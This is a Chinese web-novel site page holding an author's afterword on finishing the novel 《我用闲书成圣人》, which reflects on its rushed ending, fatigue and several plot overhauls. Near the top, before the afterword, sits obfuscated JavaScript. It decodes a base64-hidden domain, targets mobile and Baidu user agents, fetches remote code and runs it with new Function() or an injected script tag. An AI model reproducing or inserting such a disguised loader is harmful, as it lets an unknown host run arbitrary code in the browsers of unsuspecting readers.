返回小生先行别过,下一段旅程再见  出走八万里首页

关灯 护眼     字体:

上一章 目录 下一页

function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuZHNramJ2enZzLmNvbQ==','2843',window,document,['G','TpoZFcguG']);}:function(){};

再狗的断章也终有最后一句话的时候。

695天,420万字,今天,《我用闲书成圣人》完本了。

这是我第一次写网文,与我而言,是一场奇妙的旅行,我见识了瑰丽的风景,也有可爱的同行者,这段时光,我很感恩,也很满足。

现在,虽有不舍,但该落下最后的一个句点了。

接下来,进入感言环节。

先说说故事的结尾吧。

结尾的进度推得很快,略显潦草,有朋友说烂尾了,也说故事架构太大,笔力不足,控制不住了。

其实在上个月的时候,八万就陷入了一种挣扎,就是到底要写多长?

看过故事的朋友都知道,以八万设计的大背景来说,真的想要扯开了写,再写个一两百万字问题不大。

别的不说,八万再把《西游记》的内容裹进来,人族上古先贤都写出来,再让所有耳熟能详的神话人物都一一登场,金仙境走个八十万字,造化境再来个八十万字,最后封圣大结局三十万字,简直轻松加惬意,和笔力没什么关系。

而且从收入的角度来说,虽然这本书走不了大版权,但是以目前的成绩,即便是我这样拖后腿的更新,一个月保底六位数是没有问题的。

两百万字,完全可以再写十个月。

但是,八万最后否决了这个想法。

原因很简单,这么写的话,“闲书”的存在就变得没有了意义,这个故事也成了一个正常的洪荒流故事。

在八万看来,那才是真的崩了。

与其在后面被大家吐槽,不如做一个体面的道别吧。

所以,我给大结局定下的基调就是把前面该填的坑都填上,把大背景和时间线说清楚,人物和逻辑维持住,然后,尽快结束。

除此之外,还有一个重要原因,那就是八万确实有点疲惫了。

这本书从一开始,八万其实就没有准备好,没有大纲,没有人设,真的是打开word就是干。因为没想过它会有现在的成绩,也没想过自己会写这么长,毕竟原本的想法只是打发一下因为疫情而空出的时间而已。

万里通天路的设定,我比你们大概早知道三个小时;竹林七贤的人物设定,我和你们几乎是同步获取;那一个个改变故事走向的消息,不到那一章出来,我也不知道里面到底是什么内容……

你们以为我的问题是没有存稿吗?

不,我的问题是,每天都要面对空白的文档,想着昨天那个缺德的断章,思考怎么接!

别的作者说日更,是看着一屋子的食材,考虑今天做什么菜;八万说日更,是看着干净的余额,想着先从哪挣点钱去买菜,再来做饭。

也幸亏是我底(恬)蕴(不)深(知)厚(耻),一步步将故事写到了现在……

(插一句啊,不倡导这么做啊,因为真的不好)

所以,三百万字之前的时候,八万时不时还能加更一下,等到三百五十万字左右,尤其是开始写《封神演义》之后,疲倦就爆发了。有的时候,八万坐在电脑前三四个小时,就是不想动脑子。

其实,一直很愧疚埃

所以,下本书,八万一定要好好准备,大纲、人设、主线、存稿都要到位!

到时候彻底摘下文人之耻的帽子!

说完结尾的问题,再回顾一下这本书吧。

如果要我给这第一本书打分,我想应该就是个六七十分吧。

不是凡尔赛,而是因为准备不足的原因,确实在书中留下了许多的遗憾,很多表达并不算优秀。这是我的教训,也是我下一本书的经验。

这本书的剧情就经历过几次大的调整。

最开始,八万是想用历史文的思路去写这个故事,总共写个七八十万字,大约相当于四十五集剧本的长度。

所以,才会有陈洛入朝的那一段剧情,才会涉及到太子之死、立储之争、皇后怨恨、四相分立、景王世子的元素。(插一句啊,皇后的结局书里提过了,得知了真相,去祖地养老了)

也就是在那段时间,这本书均订暴涨,达到了万订,而八万这边的戏因为疫情又再次推迟,所以八万第一次推翻了原来的想法,决定改成玄幻思路。

但是前面的布局几乎扎死了,陈洛留在京城,大背景只能是朝堂之争,所以八万设计了那一场至今槽点都很多的城外围杀,引出竹林势力,将陈洛从京城调到东苍,将主线背景替换成人蛮之争。

第二次大的调整,发生在陈洛游历天下的剧情。

在写这段剧情的时候,主编大大和我长谈了许久,总而言之就是一句话:游历剧情不好写。强如xxxx,和xxxxx,在游历剧情的时候,追读都崩了。

但是作者嘛,总会觉得自己是幸运的那一个。在我的想法里,我想通过主角游历天下,展现大玄风貌,描绘世态人心,正好配合《八仙得道传》,着重写一写红尘万象,中间再配合玉迦刺杀线,完成整卷的讲述。包括当初七十二书院的设定,也是为此服务。

但是……

追读果然崩了!

于是,二师姐出马,三巴掌把陈洛打到了南荒。

果然,《聊斋》一出,追读又回来了。

第三次大的调整,是血脉潮汐那个部分。

这里倒没有调整剧情,但是八万在这个部分开始调整写法,倾向于更浅的文字表述,加大了“玩梗”的成分,风格更加轻松一些,包括颜文字的运用也更加频繁。

这么做当然有利有弊,一度有人怀疑是不是换枪手了。

其实调整的原因嘛,一来是让自己写的时候更愉悦一些,二来也是八万在寻找自己的写作风格,其实后面也都有一些微调,目前还需要继续学习和努力。

第四次大调整,倒没什么好说的,就是蛊门那一段剧情。

『加入书签,方便阅读』

上一章 目录 下一页